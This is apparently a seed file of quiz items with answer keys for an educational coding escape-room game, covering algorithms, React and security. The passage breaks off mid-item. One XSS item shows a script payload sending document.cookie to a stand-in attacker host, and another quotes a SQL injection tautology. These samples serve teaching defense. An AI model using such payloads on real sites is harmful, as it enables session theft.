/**
 * Abyss Sentinel Mainframe - Master Question Bank Seed Dataset
 * Contains 70 comprehensive, pedagogical, psychological-horror escape room challenges.
 * Mapped across all 5 facility domains and all 14 interactive puzzle slots (Sectors 1-5).
 */

export const SEED_QUESTIONS = [
  // =========================================================================
  // DOMAIN 1: Data Structures & Algorithms (14 Puzzles)
  // =========================================================================
  {
    id: '00000001-0000-4000-8000-000000000001',
    sector_level: 1,
    puzzle_slot: 1,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Easy',
    title: 'The Sliding Window Threshold',
    scenario: 'The laboratory terminal is buffering high-frequency seismic telemetry, crashing the memory bus with an O(N^2) brute force loop.',
    question: 'Which algorithmic pattern uses two boundaries moving across a contiguous array to compute running window statistics in linear O(N) time?',
    code_snippet: 'function maxSubarray(arr, k) {\n  let windowSum = 0;\n  for (let i = 0; i < k; i++) windowSum += arr[i];\n  let maxSum = windowSum;\n  for (let i = k; i < arr.length; i++) {\n    windowSum += arr[i] - arr[i - k]; // WHAT ALGORITHM PATTERN IS THIS?\n    maxSum = Math.max(maxSum, windowSum);\n  }\n  return maxSum;\n}',
    answer: ['sliding window', 'sliding window technique', 'sliding window algorithm', 'sliding-window'],
    hint: 'A rectangular glass pane that shifts across the array frame by frame.',
    explanation: 'The sliding window technique tracks a continuous range of elements, adding the incoming element and subtracting the evicted one in O(1) time.',
    tags: ['dsa', 'arrays', 'sliding-window', 'two-pointer', 'sector-1'],
  },
  {
    id: '00000001-0000-4000-8000-000000000002',
    sector_level: 1,
    puzzle_slot: 2,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Easy',
    title: 'The Pointer Cycle Anomaly',
    scenario: 'A corrupted singly linked list in the drawer lock circuits enters an infinite looping pointer cycle.',
    question: 'In Floyd\'s cycle-finding algorithm, how many steps does the faster "hare" pointer advance on each iteration relative to the "tortoise"?',
    code_snippet: 'let slow = head;\nlet fast = head;\nwhile (fast && fast.next) {\n  slow = slow.next;\n  fast = fast.next.next; // How many nodes forward?\n  if (slow === fast) return true; // Cycle detected\n}',
    answer: ['2', 'two', '2 steps', 'two nodes', '2 nodes'],
    hint: 'The hare moves at double the velocity of the tortoise.',
    explanation: 'Floyd\'s Cycle-Finding Algorithm uses two pointers moving at speeds of 1 and 2 nodes per step to detect closed loops in O(N) time and O(1) space.',
    tags: ['dsa', 'linked-list', 'pointers', 'cycle-detection', 'floyd', 'sector-1'],
  },
  {
    id: '00000001-0000-4000-8000-000000000003',
    sector_level: 1,
    puzzle_slot: 3,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Easy',
    title: 'The Recursive Stack Collapse',
    scenario: 'Sector 1 exit security subroutine is stuck in unbounded recursion, causing a fatal Call Stack Size Exceeded crash.',
    question: 'What essential structural condition is missing from a recursive function to stop it from invoking itself forever?',
    code_snippet: 'function traverseSector(node) {\n  // FATAL: Missing condition that checks if node is null!\n  traverseSector(node.left);\n  traverseSector(node.right);\n}',
    answer: ['base case', 'base condition', 'a base case', 'termination condition', 'base-case'],
    hint: 'The foundation on which every recursive tree stops branching downward.',
    explanation: 'Every recursive algorithm requires a base case to terminate call frames before exceeding OS stack allocation boundaries.',
    tags: ['dsa', 'recursion', 'call-stack', 'base-case', 'sector-1'],
  },
  {
    id: '00000001-0000-4000-8000-000000000004',
    sector_level: 2,
    puzzle_slot: 4,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Intermediate',
    title: 'The Sorted Tree Invariant',
    scenario: 'The server rack indexing binary search tree needs its keys read in ascending sequence to unlock the vault bus.',
    question: 'Which tree traversal order visits nodes in the sequence Left Subtree -> Root Node -> Right Subtree to yield sorted keys in a BST?',
    code_snippet: 'function traverse(node) {\n  if (!node) return;\n  traverse(node.left);\n  emitKey(node.value); // Processed in sorted order\n  traverse(node.right);\n}',
    answer: ['in-order', 'inorder', 'in order', 'in-order traversal', 'inorder traversal'],
    hint: 'The node is visited right "in" the middle of its two children.',
    explanation: 'In-order traversal of a valid Binary Search Tree processes keys in strictly non-decreasing sorted order.',
    tags: ['dsa', 'trees', 'bst', 'in-order', 'binary-tree', 'sector-2'],
  },
  {
    id: '00000001-0000-4000-8000-000000000005',
    sector_level: 2,
    puzzle_slot: 5,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Intermediate',
    title: 'The Level-Order Buffer Breach',
    scenario: 'The network router is routing escape pods through the shortest unweighted path using level-by-level breadth exploration.',
    question: 'Which linear data structure (FIFO) must Breadth-First Search (BFS) utilize to explore graph vertices in level order?',
    code_snippet: 'const exploration = [];\nexploration.push(startNode);\nwhile (exploration.length > 0) {\n  const current = exploration.shift(); // First In, First Out\n  // WHAT DATA STRUCTURE IS THIS?\n}',
    answer: ['queue', 'fifo queue', 'a queue'],
    hint: 'People standing in a queue waiting to be served in arrival order.',
    explanation: 'BFS relies on a FIFO queue to discover graph nodes in order of their edge distance from the root vertex.',
    tags: ['dsa', 'bfs', 'queue', 'graphs', 'shortest-path', 'sector-2'],
  },
  {
    id: '00000001-0000-4000-8000-000000000006',
    sector_level: 2,
    puzzle_slot: 6,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Intermediate',
    title: 'The Exponential Tree Pruner',
    scenario: 'Sector 2 blast door pathfinding is recalculating the same subproblems 2^N times, starving the mainframe clock.',
    question: 'What optimization technique records the return values of expensive subproblems in a cache to prevent redundant recursive calculations?',
    code_snippet: 'const cache = {};\nfunction solve(n) {\n  if (n in cache) return cache[n]; // Return stored result\n  const result = solve(n - 1) + solve(n - 2);\n  cache[n] = result;\n  return result;\n}',
    answer: ['memoization', 'memoize', 'caching', 'dynamic programming', 'memo'],
    hint: 'Writing a reminder or "memo" of answers you have previously computed.',
    explanation: 'Memoization stores top-down subproblem evaluations in lookup tables, transforming exponential O(2^N) recursion into linear O(N) operations.',
    tags: ['dsa', 'dynamic-programming', 'memoization', 'optimization', 'sector-2'],
  },
  {
    id: '00000001-0000-4000-8000-000000000007',
    sector_level: 3,
    puzzle_slot: 7,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Spectral Cycle Hunt',
    scenario: 'Coolant routing valves form a directed dependency graph. An unhandled cycle will cause the coolant pump to deadlock.',
    question: 'What collection structure is used during Depth-First Search (DFS) traversal to track nodes currently in the active recursion call stack?',
    code_snippet: 'function hasCycle(node, visited, recursionStack) {\n  visited.add(node);\n  recursionStack.add(node);\n  for (const neighbor of graph[node]) {\n    if (recursionStack.has(neighbor)) return true; // Cycle found\n  }\n  recursionStack.delete(node); // Backtrack\n  return false;\n}',
    answer: ['set', 'hash set', 'hashset', 'recursion stack', 'visited set'],
    hint: 'An unordered collection with O(1) element lookup and unique values.',
    explanation: 'A Hash Set provides O(1) membership testing to detect back-edges to ancestor vertices in the active recursion stack during DFS.',
    tags: ['dsa', 'dfs', 'graphs', 'cycle-detection', 'backtracking', 'sector-3'],
  },
  {
    id: '00000001-0000-4000-8000-000000000008',
    sector_level: 3,
    puzzle_slot: 8,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Logarithmic Midpoint Guard',
    scenario: 'The reactor shutdown index array has 2 billion elements. A naive binary search midpoint calculation triggers an integer overflow error.',
    question: 'To prevent 32-bit signed integer overflow when calculating mid in binary search, how should mid be computed instead of (low + high) / 2?',
    code_snippet: '// OVERFLOW RISK: mid = (low + high) / 2;\n// SAFE FORMULA: mid = low + (_______) / 2;',
    answer: ['high - low', 'high-low', '(high - low)'],
    hint: 'Take the distance between high and low, halve it, then add it to low.',
    explanation: 'Calculating `low + (high - low) / 2` mathematically equals `(low + high) / 2` but avoids exceeding the maximum 32-bit integer boundary (2^31 - 1).',
    tags: ['dsa', 'binary-search', 'overflow', 'arithmetic', 'sector-3'],
  },
  {
    id: '00000001-0000-4000-8000-000000000009',
    sector_level: 4,
    puzzle_slot: 9,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Min-Heap Root Extraction',
    scenario: 'A contaminated memory shard prioritizes anomaly telemetry using a binary min-heap data structure.',
    question: 'What is the theoretical worst-case time complexity of extracting the minimum root element and restoring the heap property in a binary heap with N nodes?',
    code_snippet: 'class MinHeap {\n  extractMin() {\n    const min = this.heap[0];\n    this.heap[0] = this.heap.pop();\n    this.siftDown(0); // WHAT IS THE BIG-O RUNTIME OF THIS OPERATION?\n    return min;\n  }\n}',
    answer: ['o(log n)', 'o(logn)', 'log n', 'logn', 'o(log(n))'],
    hint: 'The height of a balanced binary tree determines the sift-down distance.',
    explanation: 'Extracting the root and sifting the replacement node down a binary tree of N elements takes logarithmic time O(log N).',
    tags: ['dsa', 'heap', 'priority-queue', 'time-complexity', 'sector-4'],
  },
  {
    id: '00000001-0000-4000-8000-000000000010',
    sector_level: 4,
    puzzle_slot: 10,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Corrupted Prefix Trie',
    scenario: 'Anomaly telemetry classification uses a Trie (prefix tree) to match corrupted biometric callsigns with sub-millisecond latency.',
    question: 'What boolean property is commonly stored on each Trie node to denote that a path from root represents a complete valid stored word?',
    code_snippet: 'class TrieNode {\n  constructor() {\n    this.children = {};\n    this._________ = false; // WHAT BOOLEAN FLAG MARKS WORD COMPLETION?\n  }\n}',
    answer: ['isendofword', 'isend', 'isword', 'is_end_of_word', 'is_end'],
    hint: 'Indicates the current node is the "end of word".',
    explanation: 'In a Trie, the `isEndOfWord` boolean distinguishes prefixes that are valid stored keys from intermediate substring branches.',
    tags: ['dsa', 'trie', 'prefix-tree', 'strings', 'sector-4'],
  },
  {
    id: '00000001-0000-4000-8000-000000000011',
    sector_level: 4,
    puzzle_slot: 11,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Weighted Relaxation Matrix',
    scenario: 'Containment gate escape corridors have variable latency edge weights. Dijkstra\'s algorithm is resolving the quickest escape path.',
    question: 'In Dijkstra\'s algorithm, what term describes the step where a shorter newly discovered path to vertex V via U updates distance[V]?',
    code_snippet: 'if (distances[u] + weight < distances[v]) {\n  distances[v] = distances[u] + weight;\n  // WHAT IS THIS CORE STEP CALLED?\n}',
    answer: ['relaxation', 'relax', 'edge relaxation', 'relaxing'],
    hint: 'Tension is released when a tighter, shorter distance bound is discovered.',
    explanation: 'Edge relaxation tests whether the current shortest path estimate to V can be improved by traversing through U.',
    tags: ['dsa', 'dijkstra', 'graphs', 'greedy', 'shortest-path', 'sector-4'],
  },
  {
    id: '00000001-0000-4000-8000-000000000012',
    sector_level: 5,
    puzzle_slot: 12,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Topological Pipeline Deadlock',
    scenario: 'The quantum synthesizer core requires 12 concurrent dependency tasks executed in valid topological dependency sequence.',
    question: 'In Kahn\'s algorithm for topological sorting of a Directed Acyclic Graph (DAG), nodes with what in-degree count are initially added to the queue?',
    code_snippet: 'const queue = [];\nfor (const [node, degree] of inDegree.entries()) {\n  if (degree === ___) { // WHAT IN-DEGREE NUMBER QUALIFIES NODES TO START?\n    queue.push(node);\n  }\n}',
    answer: ['0', 'zero'],
    hint: 'A node that depends on nothing has zero prerequisites.',
    explanation: 'Kahn\'s algorithm begins by enqueueing all vertices with an in-degree of 0 (no remaining prerequisite incoming edges).',
    tags: ['dsa', 'topological-sort', 'dag', 'graphs', 'kahns-algorithm', 'sector-5'],
  },
  {
    id: '00000001-0000-4000-8000-000000000013',
    sector_level: 5,
    puzzle_slot: 13,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Advanced',
    title: 'The Bitwise Singularity Invariant',
    scenario: 'An array of biometric tokens contains duplicate pairs except for one solitary anomaly key. Gravity inversion requires finding it in O(1) space.',
    question: 'Which bitwise operator has the identity properties A ^ A = 0 and A ^ 0 = A, allowing you to isolate the unique element in linear time?',
    code_snippet: 'let unique = 0;\nfor (const num of tokens) {\n  unique = unique ___ num; // WHAT BITWISE OPERATOR CANCELS OUT DUPLICATES?\n}',
    answer: ['^', 'xor', 'bitwise xor', '^ '],
    hint: 'The caret symbol in C/JS that represents exclusive OR.',
    explanation: 'Because XOR is commutative, associative, and self-inverting (x ^ x = 0), XORing all numbers cancels identical pairs, leaving the single unique value.',
    tags: ['dsa', 'bitwise', 'xor', 'binary', 'bit-manipulation', 'sector-5'],
  },
  {
    id: '00000001-0000-4000-8000-000000000014',
    sector_level: 5,
    puzzle_slot: 14,
    domain: 'Data Structures & Algorithms',
    difficulty: 'Expert',
    title: 'The Disjoint Union Path Compressor',
    scenario: 'The final singularity portal tracks dynamic connectivity across fractured spacetime clusters using Disjoint Set Union (DSU).',
    question: 'What optimization in Disjoint Set Union flattens the tree by pointing every traversed node directly to the root during find operations?',
    code_snippet: 'function find(x) {\n  if (parent[x] !== x) {\n    parent[x] = find(parent[x]); // WHAT OPTIMIZATION IS THIS RE-ASSIGNMENT?\n  }\n  return parent[x];\n}',
    answer: ['path compression', 'path-compression', 'compression'],
    hint: 'Compressing the path so future find calls take nearly O(1) amortized time.',
    explanation: 'Path compression flattens the tree structure during find() calls, achieving near-constant alpha(N) inverse Ackermann time complexity.',
    tags: ['dsa', 'dsu', 'union-find', 'graphs', 'path-compression', 'sector-5'],
  },

  // =========================================================================
  // DOMAIN 2: React & Frontend Architecture (14 Puzzles)
  // =========================================================================
  {
    id: '00000002-0000-4000-8000-000000000001',
    sector_level: 1,
    puzzle_slot: 1,
    domain: 'React & Frontend Architecture',
    difficulty: 'Easy',
    title: 'The Direct Mutation Glitch',
    scenario: 'The laboratory monitor UI fails to re-render when player sanity depletes because state was mutated directly.',
    question: 'What React hook returns the current state value and a state setter function to trigger component re-renders?',
    code_snippet: 'const [sanity, setSanity] = ________(100); // WHAT HOOK DECLARES REACTIVE STATE?',
    answer: ['usestate', 'usestate()', 'use state', 'react.usestate'],
    hint: 'It allows functional components to "use" reactive "state".',
    explanation: 'useState is the primary React primitive for state variables; direct mutations (e.g. sanity = 90) fail to trigger virtual DOM reconciliation passes.',
    tags: ['react', 'useState', 'hooks', 'state', 'immutability', 'sector-1'],
  },
  {
    id: '00000002-0000-4000-8000-000000000002',
    sector_level: 1,
    puzzle_slot: 2,
    domain: 'React & Frontend Architecture',
    difficulty: 'Easy',
    title: 'The Cascade Re-render Loop',
    scenario: 'The drawer control panel freezes the browser tab in an infinite network request loop inside an unconstrained effect.',
    question: 'What should be passed as the second argument to useEffect to guarantee that the effect runs strictly once when the component mounts?',
    code_snippet: 'useEffect(() => {\n  initTelemetryStream();\n}, /* WHAT ARGUMENT ENSURES RUN ONCE ON MOUNT? */);',
    answer: ['[]', 'empty array', 'an empty array', '[] '],
    hint: 'Two square brackets with nothing between them.',
    explanation: 'An empty dependency array `[]` signals to React that the effect has no dependencies, scheduling execution solely after the initial commit/mount.',
    tags: ['react', 'useEffect', 'lifecycle', 'dependencies', 'sector-1'],
  },
  {
    id: '00000002-0000-4000-8000-000000000003',
    sector_level: 1,
    puzzle_slot: 3,
    domain: 'React & Frontend Architecture',
    difficulty: 'Intermediate',
    title: 'The Phantom Listener Memory Leak',
    scenario: 'Sector 1 exit terminal attaches window keyboard listeners on every re-render without releasing them, crashing memory threads.',
    question: 'What type of value must a useEffect callback return to clean up subscriptions, timers, or event listeners when unmounting?',
    code_snippet: 'useEffect(() => {\n  const handler = () => pulseBeacon();\n  window.addEventListener("keydown", handler);\n  return () => window.removeEventListener("keydown", handler); // WHAT IS THIS RETURN VALUE?\n}, []);',
    answer: ['cleanup function', 'a cleanup function', 'cleanup', 'function', 'a function'],
    hint: 'A callback designed to clean up and detach side effects.',
    explanation: 'Returning a cleanup function ensures React executes teardown logic before re-running the effect or unmounting the component.',
    tags: ['react', 'useEffect', 'cleanup', 'memory-leaks', 'listeners', 'sector-1'],
  },
  {
    id: '00000002-0000-4000-8000-000000000004',
    sector_level: 2,
    puzzle_slot: 4,
    domain: 'React & Frontend Architecture',
    difficulty: 'Intermediate',
    title: 'The Persistent Non-Rendering Ref',
    scenario: 'A server rack needs to track animation frame IDs across render passes without causing unwanted UI re-renders.',
    question: 'Which React hook returns a mutable object with a ".current" property whose mutations do NOT trigger a component re-render?',
    code_snippet: 'const animId = ________(null);\nanimId.current = requestAnimationFrame(loop); // DOES NOT TRIGGER RE-RENDER',
    answer: ['useref', 'useref()', 'use ref', 'react.useref'],
    hint: 'Used frequently for direct DOM references or mutable instance variables.',
    explanation: 'useRef stores mutable references that survive across renders without triggering a re-render cycle when modified.',
    tags: ['react', 'useRef', 'mutable-state', 'dom-refs', 'sector-2'],
  },
  {
    id: '00000002-0000-4000-8000-000000000005',
    sector_level: 2,
    puzzle_slot: 5,
    domain: 'React & Frontend Architecture',
    difficulty: 'Intermediate',
    title: 'The Prop Drilling Bypass Matrix',
    scenario: 'Operator security clearance data must be shared across ten nested child components without manually forwarding props through every layer.',
    question: 'What React API pair (createContext and its consumer hook) eliminates prop drilling by broadcasting values across the tree?',
    code_snippet: 'const ClearanceContext = createContext(null);\n// Inside deeply nested consumer component:\nconst clearance = ________(ClearanceContext);',
    answer: ['usecontext', 'usecontext()', 'use context', 'react.usecontext'],
    hint: 'The hook that consumes a React Context.',
    explanation: 'useContext consumes values provided by a Context.Provider higher up in the component tree without intermediary prop drilling.',
    tags: ['react', 'context', 'useContext', 'state-management', 'prop-drilling', 'sector-2'],
  },
  {
    id: '00000002-0000-4000-8000-000000000006',
    sector_level: 2,
    puzzle_slot: 6,
    domain: 'React & Frontend Architecture',
    difficulty: 'Intermediate',
    title: 'The Reconciliation Identity Key',
    scenario: 'Dynamically generated sensor cards in the blast door HUD lose input focus and re-order unpredictably during array updates.',
    question: 'What special reserved prop must be provided to list elements in React to provide elements with a stable identity for the diffing algorithm?',
    code_snippet: '{anomalies.map((item) => (\n  <SensorCard /* WHAT ESSENTIAL PROP GOES HERE? */={item.id} data={item} />\n))}',
    answer: ['key', 'key prop', 'key={item.id}'],
    hint: 'A three-letter word that unlocks unique item identity in virtual DOM diffing.',
    explanation: 'Keys allow React\'s reconciliation engine to match elements across renders, avoiding full DOM recreation and state confusion during array mutations.',
    tags: ['react', 'reconciliation', 'virtual-dom', 'keys', 'performance', 'sector-2'],
  },
  {
    id: '00000002-0000-4000-8000-000000000007',
    sector_level: 3,
    puzzle_slot: 7,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Referential Callback Cache',
    scenario: 'A heavy 3D radar canvas inside the reactor core re-renders on every tick because a callback function reference changes on each render pass.',
    question: 'Which React hook caches a function definition between renders to maintain referential equality across render cycles?',
    code_snippet: 'const handleVectorShift = ________(() => {\n  updateCoreCoordinates(target);\n}, [target]); // Caches function instance',
    answer: ['usecallback', 'usecallback()', 'use callback', 'react.usecallback'],
    hint: 'Similar to useMemo, but specifically caches function references rather than computed values.',
    explanation: 'useCallback preserves referential equality of callbacks passed to memoized child components, preventing unnecessary child re-renders.',
    tags: ['react', 'useCallback', 'useMemo', 'performance', 'referential-equality', 'sector-3'],
  },
  {
    id: '00000002-0000-4000-8000-000000000008',
    sector_level: 3,
    puzzle_slot: 8,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Custom Hook Encapsulator',
    scenario: 'Complex radiation sensor polling and retry logic is duplicated across five terminal components instead of being encapsulated into a reusable hook.',
    question: 'By official React convention, what two-letter prefix must all custom hooks start with to allow ESLint to enforce the Rules of Hooks?',
    code_snippet: 'function ________RadiationSensor(sensorId) {\n  const [level, setLevel] = useState(0);\n  // reusable logic\n  return level;\n}',
    answer: ['use', 'use ', 'use-'],
    hint: 'Like useState, useEffect, useRef; all hooks start with this prefix.',
    explanation: 'The `use` prefix informs React and static analysis tools that a function adheres to the Rules of Hooks and may invoke other hooks internally.',
    tags: ['react', 'custom-hooks', 'hooks', 'architecture', 'rules-of-hooks', 'sector-3'],
  },
  {
    id: '00000002-0000-4000-8000-000000000009',
    sector_level: 4,
    puzzle_slot: 9,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Asynchronous Code Splitter',
    scenario: 'The debug wing initial bundle size is 15MB, blocking initial paint until dynamically imported components are partitioned.',
    question: 'What React wrapper component displays a fallback spinner while child components loaded via React.lazy() are downloading over the wire?',
    code_snippet: '<________ fallback={<TerminalLoader />}>\n  <HeavyDiagnosticModule />\n</________>',
    answer: ['suspense', '<suspense>', 'react.suspense', '<suspense></suspense>'],
    hint: 'Keeps the user in "suspense" until the chunk resolves.',
    explanation: '`<Suspense>` catches loading promises thrown by React.lazy dynamic imports and renders a fallback placeholder until the asset arrives.',
    tags: ['react', 'suspense', 'lazy', 'code-splitting', 'performance', 'sector-4'],
  },
  {
    id: '00000002-0000-4000-8000-000000000010',
    sector_level: 4,
    puzzle_slot: 10,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Unidirectional State Flow',
    scenario: 'Debug console state is scattered across mutative global variables, leading to unpredictable synchronization glitches and race states.',
    question: 'In modern state stores like Zustand or Redux, what architecture guarantees that state updates flow in one predictable direction from action to store to UI?',
    code_snippet: '// State -> UI -> Action / Dispatch -> Reducer / Set -> State\n// WHAT IS THIS DATA FLOW PATTERN CALLED?',
    answer: ['unidirectional data flow', 'unidirectional', 'one-way data flow', 'one way data flow', 'flux'],
    hint: 'Data flowing in a single, un-reversed direction.',
    explanation: 'Unidirectional data flow ensures state transitions occur through explicit actions and pure reducers/setters, guaranteeing deterministic debugging.',
    tags: ['react', 'zustand', 'redux', 'state-management', 'flux', 'sector-4'],
  },
  {
    id: '00000002-0000-4000-8000-000000000011',
    sector_level: 4,
    puzzle_slot: 11,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Concurrent Batching Synchronizer',
    scenario: 'In React 18, updating three state setters sequentially inside a fetch promise used to trigger three separate renders, but now batches them into one.',
    question: 'What feature introduced in React 18 automatically groups multiple state updates together within promises and timeouts to optimize render passes?',
    code_snippet: 'fetch("/api/status").then(() => {\n  setSanity(85);\n  setAlarm(true);\n  setZone(4);\n  // React 18 groups these into 1 single render pass. What is this feature?\n});',
    answer: ['automatic batching', 'batching', 'auto batching', 'state batching'],
    hint: 'Grouping updates together "automatically in batches".',
    explanation: 'React 18 automatic batching queues state changes across all asynchronous contexts (promises, timeouts, native events) into a single optimized re-render.',
    tags: ['react', 'react-18', 'automatic-batching', 'batching', 'performance', 'sector-4'],
  },
  {
    id: '00000002-0000-4000-8000-000000000012',
    sector_level: 5,
    puzzle_slot: 12,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Non-Blocking Transition Core',
    scenario: 'Typing into the nexus search console causes the heavy 3D scene to stutter because the input render and heavy filter share the same high priority.',
    question: 'Which React 18 hook allows you to mark state updates as non-urgent transitions so urgent user keystrokes remain fluid and responsive?',
    code_snippet: 'const [isPending, ________] = useTransition();\nstartTransition(() => {\n  setHeavyGraphFilter(query); // Marked as non-blocking transition\n});',
    answer: ['starttransition', 'start_transition', 'start transition'],
    hint: 'The function returned by useTransition that "starts" the transition.',
    explanation: 'useTransition yields control back to high-priority browser events (like typing or clicks) by marking expensive state updates as interruptible transitions.',
    tags: ['react', 'useTransition', 'concurrent-mode', 'performance', 'sector-5'],
  },
  {
    id: '00000002-0000-4000-8000-000000000013',
    sector_level: 5,
    puzzle_slot: 13,
    domain: 'React & Frontend Architecture',
    difficulty: 'Advanced',
    title: 'The Dangerous HTML Entity Escape',
    scenario: 'Corrupted facility telemetry strings contain embedded attacker scripts. Directly rendering them into the DOM enables Cross-Site Scripting (XSS).',
    question: 'What dangerous React prop allows raw HTML to be inserted directly into an element, requiring strict sanitization with libraries like DOMPurify?',
    code_snippet: '<div ________={{ __html: sanitize(untrustedLogString) }} />',
    answer: ['dangerouslysetinnerhtml', 'dangerouslySetInnerHTML'],
    hint: 'It warns you right in its camelCase name that setting inner HTML is "dangerous".',
    explanation: 'dangerouslySetInnerHTML bypasses React\'s built-in string escaping; raw unsanitized HTML passed to it exposes clients to full DOM XSS attacks.',
    tags: ['react', 'dangerouslySetInnerHTML', 'xss', 'security', 'sanitization', 'sector-5'],
  },
  {
    id: '00000002-0000-4000-8000-000000000014',
    sector_level: 5,
    puzzle_slot: 14,
    domain: 'React & Frontend Architecture',
    difficulty: 'Expert',
    title: 'The Hydration Invariant Fracture',
    scenario: 'In the Server-Side Rendered (SSR) singularity terminal, server-rendered HTML rendered a timestamp that mismatched client clock output on boot.',
    question: 'What specific React error occurs when the pre-rendered server HTML markup does not match the initial virtual DOM tree rendered on client boot?',
    code_snippet: 'Error: Text content did not match. Server: "04:12:00" Client: "04:12:01"\n// WHAT TYPE OF SSR ERROR HAS OCCURRED?',
    answer: ['hydration mismatch', 'hydration error', 'hydration', 'mismatch', 'hydration failed'],
    hint: 'The dry server markup failed to "hydrate" cleanly with client state.',
    explanation: 'Hydration mismatches occur when client initial render outputs diverge from the server HTML, forcing React to discard or reconstruct subtrees.',
    tags: ['react', 'ssr', 'hydration', 'nextjs', 'isomorphic', 'sector-5'],
  },

  // =========================================================================
  // DOMAIN 3: Cybersecurity & Cryptography (14 Puzzles)
  // =========================================================================
  {
    id: '00000003-0000-4000-8000-000000000001',
    sector_level: 1,
    puzzle_slot: 1,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Easy',
    title: 'The Cryptographic Collision Shard',
    scenario: 'The laboratory archive verified firmware checksums using MD5, allowing forged payloads with identical hash digests to pass integrity checks.',
    question: 'Which modern standard cryptographic hash function in the SHA-2 family produces a secure 256-bit fixed-length output string?',
    code_snippet: 'const hash = crypto.createHash("______").update(payload).digest("hex");',
    answer: ['sha256', 'sha-256', 'sha 256', 'SHA-256', 'SHA256'],
    hint: 'Secure Hash Algorithm with a 256-bit digest length.',
    explanation: 'SHA-256 is a collision-resistant cryptographic hash function standard used for digital signatures, password derivation, and integrity proofs.',
    tags: ['security', 'cryptography', 'hashing', 'sha-256', 'integrity', 'sector-1'],
  },
  {
    id: '00000003-0000-4000-8000-000000000002',
    sector_level: 1,
    puzzle_slot: 2,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Easy',
    title: 'The Precomputed Rainbow Defense',
    scenario: 'Operator passwords in the laboratory database were hashed without entropy, allowing precomputed lookup tables to crack credentials instantly.',
    question: 'What unique random cryptographic string must be appended to a password before hashing to defeat precomputed Rainbow Table attacks?',
    code_snippet: 'const ______ = crypto.randomBytes(16).toString("hex");\nconst hash = pbkdf2Sync(password, ______, 100000, 64, "sha512");',
    answer: ['salt', 'a salt', 'salting'],
    hint: 'A kitchen seasoning you sprinkle on food to make it unique.',
    explanation: 'A cryptographic salt ensures identical passwords produce completely distinct hash digests, rendering precomputed rainbow tables useless.',
    tags: ['security', 'salting', 'passwords', 'rainbow-tables', 'pbkdf2', 'sector-1'],
  },
  {
    id: '00000003-0000-4000-8000-000000000003',
    sector_level: 1,
    puzzle_slot: 3,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Intermediate',
    title: 'The Injected Tautology Gate',
    scenario: 'Sector 1 exit security accepted the input \' OR \'1\'=\'1, concatenating raw user input into an un-escaped SQL authentication query.',
    question: 'What database defense uses placeholders ($1 or ?) to ensure SQL drivers treat user input strictly as literal values rather than executable code?',
    code_snippet: '// INSECURE: db.query(`SELECT * FROM users WHERE user = "${input}"`);\n// SECURE: db.query("SELECT * FROM users WHERE user = $1", [input]);\n// WHAT IS THIS QUERY TECHNIQUE CALLED?',
    answer: ['parameterized query', 'parameterized queries', 'prepared statement', 'prepared statements', 'parameterization'],
    hint: 'Queries where values are passed as separate parameters rather than string concatenation.',
    explanation: 'Parameterized queries / prepared statements precompile SQL statements, guaranteeing malicious syntax in parameters cannot alter execution trees.',
    tags: ['security', 'sql-injection', 'sqli', 'parameterized-queries', 'owasp', 'sector-1'],
  },
  {
    id: '00000003-0000-4000-8000-000000000004',
    sector_level: 2,
    puzzle_slot: 4,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Intermediate',
    title: 'The Reflected Script Vector',
    scenario: 'The server rack diagnostic log prints URL query parameters directly into the browser DOM, allowing attackers to execute arbitrary JavaScript.',
    question: 'What OWASP Top 10 vulnerability occurs when malicious client scripts are injected and executed inside an unsuspecting user\'s browser session?',
    code_snippet: '// URL: /monitor?error=<script>fetch("https://attacker.evil/steal?c=" + document.cookie)</script>\n// WHAT TYPE OF ATTACK IS THIS?',
    answer: ['xss', 'cross-site scripting', 'cross site scripting', 'reflected xss'],
    hint: 'Abbreviated with an "X" to avoid confusion with Cascading Style Sheets.',
    explanation: 'Cross-Site Scripting (XSS) occurs when applications render unvalidated input into the DOM, allowing attackers to hijack sessions and steal tokens.',
    tags: ['security', 'xss', 'web-security', 'owasp', 'sanitization', 'sector-2'],
  },
  {
    id: '00000003-0000-4000-8000-000000000005',
    sector_level: 2,
    puzzle_slot: 5,
    domain: 'Cybersecurity & Cryptography',
    difficulty: 'Intermediate',
    title: 'The Forged Request Transceiver',
    scenario: 'A malicious email in the network router tricked an authenticated admin\'s browser into executing an unauthorized state-changing transfer.',
    question: 'What unpredictable cryptographic token is embedded into HTML forms and validated by backends to defend against CSRF attacks?',
    code_snippet: '<form action="/admin/eject-core" method="POST">\n  <input type="hidden" name="__________" value="d7a4f912e8c64b" />\n  <button type="submit">Eject</button>\n</form>',
    answer: ['csrf token', 'anti-csrf token', 'anti csrf token', 'csrf-token', 'csrf'],
    hint: 'A secret token specifically designed to block Cross-Site Request Forgery.',
    explanation: 'Anti-CSRF synchronizer tokens verify that state-modifying requests originate from the application\'s own trusted forms rather than third-party sites.',
    tags: ['security', 'csrf', 'tokens', 'cookies', 'web-security', 'sector-2'],
  },
  {
    id: '00000003-0000-4000-8000-000000000006',
    sector_level: 2,
    puzzle_slot: 6,
    domain: 'Cybersecurity & Cryptography',
